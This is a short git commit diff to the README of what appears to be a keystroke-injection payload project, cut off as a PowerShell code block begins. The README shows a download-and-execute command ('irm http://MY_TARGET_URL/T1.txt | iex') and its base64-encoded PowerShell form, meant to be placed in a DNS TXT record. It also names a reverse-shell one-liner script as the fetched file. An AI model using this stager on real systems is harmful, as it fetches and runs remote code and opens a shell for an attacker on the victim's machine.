Update README.md

pull/468/head
Nate 2024-08-03 23:40:57 -05:00 committed by GitHub
parent b4978b7b47
commit fc745db314
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 1 additions and 1 deletions

View File

@ -11,7 +11,7 @@ DEFINE #MY_TARGET_URL example.com
No base64 can be used as an option by replacing "$a=",";powershell -e $a" with just "|iex" for the STRING payload below. Examples of the decoded command and encoded command are shown below to put into DNS TXT record.
Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
powershellReverseShellOne-liner.ps1 is identical to T1.txt. (shortened due to character limitations)
powershellReverseShellOne-liner.ps1 is identical to T1.txt. (file name shortened due to character limitations)
## Windows Commands (used in payload)
### Execute DNS TXT Payload
```Powershell